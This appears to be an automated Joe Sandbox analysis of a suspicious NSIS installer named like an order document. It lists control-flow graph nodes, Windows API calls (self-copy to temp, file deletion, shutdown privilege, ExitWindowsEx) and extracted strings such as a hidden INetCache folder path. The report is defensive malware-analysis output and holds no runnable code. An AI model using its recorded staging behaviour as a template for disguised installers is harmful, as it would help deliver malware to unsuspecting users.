4648 6fbb1831 4651 6fbb1882 4648->4651 4652 6fbb1837 4648->4652 4649 6fbb17fc 4663 6fbb17f2 4649->4663 4738 6fbb2d2f 4649->4738 4650 6fbb17e3 4654 6fbb17e9 4650->4654 4659 6fbb17f4 4650->4659 4657 6fbb256d 10 API calls 4651->4657 4760 6fbb15c6 4652->4760 4654->4663 4722 6fbb2a74 4654->4722 4664 6fbb1873 4657->4664 4658 6fbb1819 4752 6fbb15b4 4658->4752 4732 6fbb2728 4659->4732 4663->4647 4663->4648 4669 6fbb18c9 4664->4669 4767 6fbb2530 4664->4767 4666 6fbb17fa 4666->4663 4667 6fbb256d 10 API calls 4667->4664 4669->4640 4671 6fbb18d3 GlobalFree 4669->4671 4671->4640 4675 6fbb18b5 4675->4669 4771 6fbb153d wsprintfW 4675->4771 4677 6fbb18ae FreeLibrary 4677->4675 4774 6fbb121b GlobalAlloc 4678->4774 4680 6fbb1b87 4775 6fbb121b GlobalAlloc 4680->4775 4682 6fbb1dad GlobalFree GlobalFree GlobalFree 4683 6fbb1dca 4682->4683 4701 6fbb1e14 4682->4701 4684 6fbb2196 4683->4684 4692 6fbb1ddf 4683->4692 4683->4701 4686 6fbb21b8 GetModuleHandleW 4684->4686 4684->4701 4685 6fbb1c68 GlobalAlloc 4707 6fbb1b92 4685->4707 4688 6fbb21c9 LoadLibraryW 4686->4688 4689 6fbb21de 4686->4689 4687 6fbb1cd1 GlobalFree 4687->4707 4688->4689 4688->4701 4782 6fbb1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4689->4782 4690 6fbb1cb3 lstrcpyW 4691 6fbb1cbd lstrcpyW 4690->4691 4691->4707 4692->4701 4778 6fbb122c 4692->4778 4694 6fbb2230 4697 6fbb223d lstrlenW 4694->4697 4694->4701 4695 6fbb20f0 4695->4701 4704 6fbb2138 lstrcpyW 4695->4704 4783 6fbb1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4697->4783 4698 6fbb2068 4781 6fbb121b GlobalAlloc 4698->4781 4701->4639 4702 6fbb21f0 4702->4694 4710 6fbb221a GetProcAddress 4702->4710 4703 6fbb1fa9 GlobalFree 4703->4707 4704->4701 4705 6fbb2257 4705->4701 4706 6fbb1d0f 4706->4707 4776 6fbb158f GlobalSize GlobalAlloc 4706->4776 4707->4682 4707->4685 4707->4687 4707->4690 4707->4691 4707->4695 4707->4698 4707->4701 4707->4703 4707->4706 4708 6fbb122c 2 API calls 4707->4708 4708->4707 4710->4694 4711 6fbb2071 4711->4639 4714 6fbb23b0 4712->4714 4713 6fbb122c GlobalAlloc lstrcpynW 4713->4714 4714->4713 4716 6fbb24d9 GlobalFree 4714->4716 4717 6fbb2458 GlobalAlloc WideCharToMultiByte 4714->4717 4718 6fbb2483 GlobalAlloc 4714->4718 4720 6fbb249a 4714->4720 4785 6fbb12ba 4714->4785 4716->4714 4719 6fbb17d3 4716->4719 4717->4716 4718->4720 4719->4649 4719->4650 4719->4663 4720->4716 4789 6fbb26bc 4720->4789 4723 6fbb2a86 4722->4723 4724 6fbb2b2b ReadFile 4723->4724 4725 6fbb2b49 4724->4725 4726 6fbb2c3a GetLastError 4725->4726 4727 6fbb2c45 4725->4727 4726->4727 4727->4663 4729 6fbb236b 4728->4729 4730 6fbb2376 GlobalAlloc 4729->4730 4731 6fbb17cc 4729->4731 4730->4729 4731->4641 4736 6fbb2758 4732->4736 4733 6fbb27f3 GlobalAlloc 4737 6fbb2816 4733->4737 4734 6fbb2806 4735 6fbb280c GlobalSize 4734->4735 4734->4737 4735->4737 4736->4733 4736->4734 4737->4666 4739 6fbb2d3a 4738->4739 4740 6fbb2d7a GlobalFree 4739->4740 4792 6fbb121b GlobalAlloc 4741->4792 4743 6fbb2623 lstrcpynW 4748 6fbb2577 4743->4748 4744 6fbb2612 StringFromGUID2 4744->4748 4745 6fbb25f0 MultiByteToWideChar 4745->4748 4746 6fbb2636 wsprintfW 4746->4748 4747 6fbb265a GlobalFree 4747->4748 4748->4743 4748->4744 4748->4745 4748->4746 4748->4747 4749 6fbb268f GlobalFree 4748->4749 4750 6fbb1272 2 API calls 4748->4750 4793 6fbb12e1 4748->4793 4749->4658 4750->4748 4797 6fbb121b GlobalAlloc 4752->4797 4754 6fbb15b9 4755 6fbb15c6 2 API calls 4754->4755 4756 6fbb15c3 4755->4756 4757 6fbb1272 4756->4757 4758 6fbb127b GlobalAlloc lstrcpynW 4757->4758 4759 6fbb12b5 GlobalFree 4757->4759 4758->4759 4759->4664 4761 6fbb15e4 4760->4761 4763 6fbb15d6 lstrcpyW 4760->4763 4761->4763 4764 6fbb15f0 4761->4764 4765 6fbb161d 4763->4765 4764->4765 4766 6fbb160d wsprintfW 4764->4766 4765->4667 4766->4765 4768 6fbb253e 4767->4768 4770 6fbb1895 4767->4770 4769 6fbb255a GlobalFree 4768->4769 4768->4770 4769->4768 4770->4675 4770->4677 4772 6fbb1272 2 API calls 4771->4772 4773 6fbb155e 4772->4773 4773->4669 4774->4680 4775->4707 4777 6fbb15ad 4776->4777 4777->4706 4784 6fbb121b GlobalAlloc 4778->4784 4780 6fbb123b lstrcpynW 4780->4701 4781->4711 4782->4702 4783->4705 4784->4780 4786 6fbb12c1 4785->4786 4787 6fbb122c 2 API calls 4786->4787 4788 6fbb12df 4787->4788 4788->4714 4790 6fbb26ca VirtualAlloc 4789->4790 4791 6fbb2720 4789->4791 4790->4791 4791->4720 4792->4748 4794 6fbb12ea 4793->4794 4795 6fbb130c 4793->4795 4794->4795 4796 6fbb12f0 lstrcpyW 4794->4796 4795->4748 4796->4795 4797->4754 5670 6fbb2c4f 5671 6fbb2c67 5670->5671 5672 6fbb158f 2 API calls 5671->5672 5673 6fbb2c82 5672->5673 4829 403d35 4830 403e88 4829->4830 4831 403d4d 4829->4831 4833 403ed9 4830->4833 4834 403e99 GetDlgItem GetDlgItem 4830->4834 4831->4830 4832 403d59 4831->4832 4836 403d64 SetWindowPos 4832->4836 4837 403d77 4832->4837 4835 403f33 4833->4835 4846 401389 2 API calls 4833->4846 4838 40420e 18 API calls 4834->4838 4840 40425a SendMessageW 4835->4840 4861 403e83 4835->4861 4836->4837 4841 403d94 4837->4841 4842 403d7c ShowWindow 4837->4842 4839 403ec3 SetClassLongW 4838->4839 4843 40140b 2 API calls 4839->4843 4868 403f45 4840->4868 4844 403db6 4841->4844 4845 403d9c DestroyWindow 4841->4845 4842->4841 4843->4833 4848 403dbb SetWindowLongW 4844->4848 4849 403dcc 4844->4849 4847 4041b8 4845->4847 4850 403f0b 4846->4850 4856 4041c8 ShowWindow 4847->4856 4847->4861 4848->4861 4852 403e75 4849->4852 4853 403dd8 GetDlgItem 4849->4853 4850->4835 4854 403f0f SendMessageW 4850->4854 4851 404199 DestroyWindow EndDialog 4851->4847 4910 404275 4852->4910 4857 403e08 4853->4857 4858 403deb SendMessageW IsWindowEnabled 4853->4858 4854->4861 4855 40140b 2 API calls 4855->4868 4856->4861 4862 403e15 4857->4862 4865 403e5c SendMessageW 4857->4865 4866 403e28 4857->4866 4873 403e0d 4857->4873 4858->4857 4858->4861 4860 4062b9 17 API calls 4860->4868 4862->4865 4862->4873 4864 40420e 18 API calls 4864->4868 4865->4852 4869 403e30 4866->4869 4870 403e45 4866->4870 4867 403e43 4867->4852 4868->4851 4868->4855 4868->4860 4868->4861 4868->4864 4891 4040d9 DestroyWindow 4868->4891 4901 40420e 4868->4901 4872 40140b 2 API calls 4869->4872 4871 40140b 2 API calls 4870->4871 4874 403e4c 4871->4874 4872->4873 4907 4041e7 4873->4907 4874->4852 4874->4873 4876 403fc0 GetDlgItem 4877 403fd5 4876->4877 4878 403fdd ShowWindow KiUserCallbackDispatcher 4876->4878 4877->4878 4904 404230 EnableWindow 4878->4904 4880 404007 EnableWindow 4883 40401b 4880->4883 4881 404020 GetSystemMenu EnableMenuItem SendMessageW 4882 404050 SendMessageW 4881->4882 4881->4883 4882->4883 4883->4881 4885 403d16 18 API calls 4883->4885 4905 404243 SendMessageW 4883->4905 4906 406297 lstrcpynW 4883->4906 4885->4883 4887 40407f lstrlenW 4888 4062b9 17 API calls 4887->4888 4889 404095 SetWindowTextW 4888->4889 4890 401389 2 API calls 4889->4890 4890->4868 4891->4847 4892 4040f3 CreateDialogParamW 4891->4892 4892->4847 4893 404126 4892->4893 4894 40420e 18 API calls 4893->4894 4895 404131 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4894->4895 4896 401389 2 API calls 4895->4896 4897 404177 4896->4897 4897->4861 4898 40417f ShowWindow 4897->4898 4899 40425a SendMessageW 4898->4899 4900 404197 4899->4900 4900->4847 4902 4062b9 17 API calls 4901->4902 4903 404219 SetDlgItemTextW 4902->4903 4903->4876 4904->4880 4905->4883 4906->4887 4908 4041f4 SendMessageW 4907->4908 4909 4041ee 4907->4909 4908->4867 4909->4908 4911 404338 4910->4911 4912 40428d GetWindowLongW 4910->4912 4911->4861 4912->4911 4913 4042a2 4912->4913 4913->4911 4914 4042d2 4913->4914 4915 4042cf GetSysColor 4913->4915 4916 4042e2 SetBkMode 4914->4916 4917 4042d8 SetTextColor 4914->4917 4915->4914 4918 404300 4916->4918 4919 4042fa GetSysColor 4916->4919 4917->4916 4920 404311 4918->4920 4921 404307 SetBkColor 4918->4921 4919->4918 4920->4911 4922 404324 DeleteObject 4920->4922 4923 40432b CreateBrushIndirect 4920->4923 4921->4920 4922->4923 4923->4911 5674 402a35 5675 402c1f 17 API calls 5674->5675 5676 402a3b 5675->5676 5677 402a72 5676->5677 5678 40288b 5676->5678 5680 402a4d 5676->5680 5677->5678 5679 4062b9 17 API calls 5677->5679 5679->5678 5680->5678 5682 4061de wsprintfW 5680->5682 5682->5678 5683 401735 5684 402c41 17 API calls 5683->5684 5685 40173c SearchPathW 5684->5685 5686 4029e6 5685->5686 5687 401757 5685->5687 5687->5686 5689 406297 lstrcpynW 5687->5689 5689->5686 5690 4014b8 5691 4014be 5690->5691 5692 401389 2 API calls 5691->5692 5693 4014c6 5692->5693 5694 4046b8 5695 4046c8 5694->5695 5696 4046ee 5694->5696 5697 40420e 18 API calls 5695->5697 5698 404275 8 API calls 5696->5698 5699 4046d5 SetDlgItemTextW 5697->5699 5700 4046fa 5698->5700 5699->5696 5701 401db9 GetDC 5702 402c1f 17 API calls 5701->5702 5703 401dcb GetDeviceCaps MulDiv ReleaseDC 5702->5703 5704 402c1f 17 API calls 5703->5704 5705 401dfc 5704->5705 5706 4062b9 17 API calls 5705->5706 5707 401e39 CreateFontIndirectW 5706->5707 5708 402592 5707->5708 5709 40283b 5710 402843 5709->5710 5711 402847 FindNextFileW 5710->5711 5712 402859 5710->5712 5711->5712 5713 4029e6 5712->5713 5715 406297 lstrcpynW 5712->5715 5715->5713 5716 40543e 5717 4055e8 5716->5717 5718 40545f GetDlgItem GetDlgItem GetDlgItem 5716->5718 5720 4055f1 GetDlgItem CreateThread CloseHandle 5717->5720 5721 405619 5717->5721 5761 404243 SendMessageW 5718->5761 5720->5721 5722 405644 5721->5722 5724 405630 ShowWindow ShowWindow 5721->5724 5725 405669 5721->5725 5726 4056a4 5722->5726 5729 405658 5722->5729 5730 40567e ShowWindow 5722->5730 5723 4054cf 5727 4054d6 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5723->5727 5763 404243 SendMessageW 5724->5763 5731 404275 8 API calls 5725->5731 5726->5725 5734 4056b2 SendMessageW 5726->5734 5732 405544 5727->5732 5733 405528 SendMessageW SendMessageW 5727->5733 5735 4041e7 SendMessageW 5729->5735 5736 405690 5730->5736 5737 40569e 5730->5737 5740 405677 5731->5740 5738 405557 5732->5738 5739 405549 SendMessageW 5732->5739 5733->5732 5734->5740 5741 4056cb CreatePopupMenu 5734->5741 5735->5725 5742 4052ff 24 API calls 5736->5742 5743 4041e7 SendMessageW 5737->5743 5745 40420e 18 API calls 5738->5745 5739->5738 5744 4062b9 17 API calls 5741->5744 5742->5737 5743->5726 5746 4056db AppendMenuW 5744->5746 5747 405567 5745->5747 5748 4056f8 GetWindowRect 5746->5748 5749 40570b TrackPopupMenu 5746->5749 5750 405570 ShowWindow 5747->5750 5751 4055a4 GetDlgItem SendMessageW 5747->5751 5748->5749 5749->5740 5752 405726 5749->5752 5753 405593 5750->5753 5754 405586 ShowWindow 5750->5754 5751->5740 5755 4055cb SendMessageW SendMessageW 5751->5755 5756 405742 SendMessageW 5752->5756 5762 404243 SendMessageW 5753->5762 5754->5753 5755->5740 5756->5756 5757 40575f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5756->5757 5759 405784 SendMessageW 5757->5759 5759->5759 5760 4057ad GlobalUnlock SetClipboardData CloseClipboard 5759->5760 5760->5740 5761->5723 5762->5751 5763->5722

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 40336c-4033a9 SetErrorMode GetVersion 1 4033ab-4033b3 call 406671 0->1 2 4033bc 0->2 1->2 7 4033b5 1->7 4 4033c1-4033d5 call 406601 lstrlenA 2->4 9 4033d7-4033f3 call 406671 * 3 4->9 7->2 16 403404-403463 #17 OleInitialize SHGetFileInfoW call 406297 GetCommandLineW call 406297 9->16 17 4033f5-4033fb 9->17 24 403465-40346c 16->24 25 40346d-403487 call 405b99 CharNextW 16->25 17->16 21 4033fd 17->21 21->16 24->25 28 40348d-403493 25->28 29 40359e-4035b8 GetTempPathW call 40333b 25->29 30 403495-40349a 28->30 31 40349c-4034a0 28->31 36 403610-40362a DeleteFileW call 402edd 29->36 37 4035ba-4035d8 GetWindowsDirectoryW lstrcatW call 40333b 29->37 30->30 30->31 33 4034a2-4034a6 31->33 34 4034a7-4034ab 31->34 33->34 38 4034b1-4034b7 34->38 39 40356a-403577 call 405b99 34->39 56 403630-403636 36->56 57 4036db-4036eb call 4038ad OleUninitialize 36->57 37->36 52 4035da-40360a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40333b 37->52 43 4034d2-40350b 38->43 44 4034b9-4034c1 38->44 54 403579-40357a 39->54 55 40357b-403581 39->55 50 403528-403562 43->50 51 40350d-403512 43->51 48 4034c3-4034c6 44->48 49 4034c8 44->49 48->43 48->49 49->43 50->39 53 403564-403568 50->53 51->50 58 403514-40351c 51->58 52->36 52->57 53->39 62 403589-403597 call 406297 53->62 54->55 55->28 63 403587 55->63 64 4036cb-4036d2 call 403987 56->64 65 40363c-403647 call 405b99 56->65 73 403811-403817 57->73 74 4036f1-403701 call 4058fd ExitProcess 57->74 59 403523 58->59 60 40351e-403521 58->60 59->50 60->50 60->59 69 40359c 62->69 63->69 76 4036d7 64->76 80 403695-40369f 65->80 81 403649-40367e 65->81 69->29 78 403895-40389d 73->78 79 403819-40382f GetCurrentProcess OpenProcessToken 73->79 76->57 82 4038a3-4038a7 ExitProcess 78->82 83 40389f 78->83 87 403831-40385f LookupPrivilegeValueW AdjustTokenPrivileges 79->87 88 403865-403873 call 406671 79->88 85 4036a1-4036af call 405c74 80->85 86 403707-40371b call 405868 lstrcatW 80->86 89 403680-403684 81->89 83->82 85->57 99 4036b1-4036c7 call 406297 * 2 85->99 100 403728-403742 lstrcatW lstrcmpiW 86->100 101 40371d-403723 lstrcatW 86->101 87->88 102 403881-40388c ExitWindowsEx 88->102 103 403875-40387f 88->103 93 403686-40368b 89->93 94 40368d-403691 89->94 93->94 95 403693 93->95 94->89 94->95 95->80 99->64 100->57 105 403744-403747 100->105 101->100 102->78 106 40388e-403890 call 40140b 102->106 103->102 103->106 109 403750 call 40584b 105->109 110 403749-40374e call 4057ce 105->110 106->78 117 403755-403763 SetCurrentDirectoryW 109->117 110->117 118 403770-403799 call 406297 117->118 119 403765-40376b call 406297 117->119 123 40379e-4037ba call 4062b9 DeleteFileW 118->123 119->118 126 4037fb-403803 123->126 127 4037bc-4037cc CopyFileW 123->127 126->123 128 403805-40380c call 40605d 126->128 127->126 129 4037ce-4037ee call 40605d call 4062b9 call 405880 127->129 128->57 129->126 138 4037f0-4037f7 CloseHandle 129->138 138->126
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNELBASE ref: 0040338F
                                                                                                                                                  • GetVersion.KERNEL32 ref: 00403395
                                                                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
                                                                                                                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040340C
                                                                                                                                                  • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
                                                                                                                                                  • GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
                                                                                                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\ORDER 20240986 OA.exe",00000020,"C:\Users\user\Desktop\ORDER 20240986 OA.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475
                                                                                                                                                    • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                                                                                    • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CC
                                                                                                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E8
                                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
                                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
                                                                                                                                                  • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615
                                                                                                                                                    • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                                                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403701
                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ORDER 20240986 OA.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ORDER 20240986 OA.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403723
                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ORDER 20240986 OA.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372E
                                                                                                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ORDER 20240986 OA.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
                                                                                                                                                  • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
                                                                                                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\ORDER 20240986 OA.exe,0079F6E0,?,?,00000006,00000008,0000000A), ref: 004037C4
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403827
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
                                                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004038A7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                  • String ID: "C:\Users\user\Desktop\ORDER 20240986 OA.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\Logoi$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ORDER 20240986 OA.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                  • API String ID: 3441113951-1544295190
                                                                                                                                                  • Opcode ID: d8beda2cf6d53e1c23663c7b3f0cac31a10eecbcac031cdf32090e7074c6eb08
                                                                                                                                                  • Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
                                                                                                                                                  • Opcode Fuzzy Hash: d8beda2cf6d53e1c23663c7b3f0cac31a10eecbcac031cdf32090e7074c6eb08
                                                                                                                                                  • Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 139 404c7b-404cc7 GetDlgItem * 2 140 404ee8-404eef 139->140 141 404ccd-404d61 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 404ef1-404f01 140->142 143 404f03 140->143 144 404d70-404d77 DeleteObject 141->144 145 404d63-404d6e SendMessageW 141->145 146 404f06-404f0f 142->146 143->146 147 404d79-404d81 144->147 145->144 148 404f11-404f14 146->148 149 404f1a-404f20 146->149 150 404d83-404d86 147->150 151 404daa-404dae 147->151 148->149 153 404ffe-405005 148->153 156 404f22-404f29 149->156 157 404f2f-404f36 149->157 154 404d88 150->154 155 404d8b-404da8 call 4062b9 SendMessageW * 2 150->155 151->147 152 404db0-404ddc call 40420e * 2 151->152 195 404de2-404de8 152->195 196 404ea7-404eba GetWindowLongW SetWindowLongW 152->196 161 405076-40507e 153->161 162 405007-40500d 153->162 154->155 155->151 156->153 156->157 158 404f38-404f3b 157->158 159 404fab-404fae 157->159 167 404f46-404f5b call 404bc9 158->167 168 404f3d-404f44 158->168 159->153 172 404fb0-404fba 159->172 164 405080-405086 SendMessageW 161->164 165 405088-40508f 161->165 170 405013-40501d 162->170 171 40525e-405270 call 404275 162->171 164->165 175 405091-405098 165->175 176 4050c3-4050ca 165->176 167->159 194 404f5d-404f6e 167->194 168->159 168->167 170->171 179 405023-405032 SendMessageW 170->179 173 404fca-404fd4 172->173 174 404fbc-404fc8 SendMessageW 172->174 173->153 182 404fd6-404fe0 173->182 174->173 183 4050a1-4050a8 175->183 184 40509a-40509b ImageList_Destroy 175->184 187 405220-405227 176->187 188 4050d0-4050dc call 4011ef 176->188 179->171 189 405038-405049 SendMessageW 179->189 190 404ff1-404ffb 182->190 191 404fe2-404fef 182->191 192 4050b1-4050bd 183->192 193 4050aa-4050ab GlobalFree 183->193 184->183 187->171 200 405229-405230 187->200 213 4050ec-4050ef 188->213 214 4050de-4050e1 188->214 198 405053-405055 189->198 199 40504b-405051 189->199 190->153 191->153 192->176 193->192 194->159 202 404f70-404f72 194->202 203 404deb-404df2 195->203 201 404ec0-404ec4 196->201 205 405056-40506f call 401299 SendMessageW 198->205 199->198 199->205 200->171 206 405232-40525c ShowWindow GetDlgItem ShowWindow 200->206 207 404ec6-404ed9 ShowWindow call 404243 201->207 208 404ede-404ee6 call 404243 201->208 209 404f74-404f7b 202->209 210 404f85 202->210 211 404e88-404e9b 203->211 212 404df8-404e20 203->212 205->161 206->171 207->171 208->140 220 404f81-404f83 209->220 221 404f7d-404f7f 209->221 224 404f88-404fa4 call 40117d 210->224 211->203 228 404ea1-404ea5 211->228 222 404e22-404e58 SendMessageW 212->222 223 404e5a-404e5c 212->223 216 405130-405154 call 4011ef 213->216 217 4050f1-40510a call 4012e2 call 401299 213->217 225 4050e3 214->225 226 4050e4-4050e7 call 404c49 214->226 241 4051f6-40520a InvalidateRect 216->241 242 40515a 216->242 247 40511a-405129 SendMessageW 217->247 248 40510c-405112 217->248 220->224 221->224 222->211 229 404e5e-404e6d SendMessageW 223->229 230 404e6f-404e85 SendMessageW 223->230 224->159 225->226 226->213 228->196 228->201 229->211 230->211 241->187 244 40520c-40521b call 404b9c call 404b84 241->244 245 40515d-405168 242->245 244->187 249 40516a-405179 245->249 250 4051de-4051f0 245->250 247->216 251 405114 248->251 252 405115-405118 248->252 254 40517b-405188 249->254 255 40518c-40518f 249->255 250->241 250->245 251->252 252->247 252->248 254->255 256 405191-405194 255->256 257 405196-40519f 255->257 259 4051a4-4051dc SendMessageW * 2 256->259 257->259 260 4051a1 257->260 259->250 260->259
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404C93
                                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404C9E
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
                                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404CFB
                                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
                                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
                                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
                                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
                                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404D71
                                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
                                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
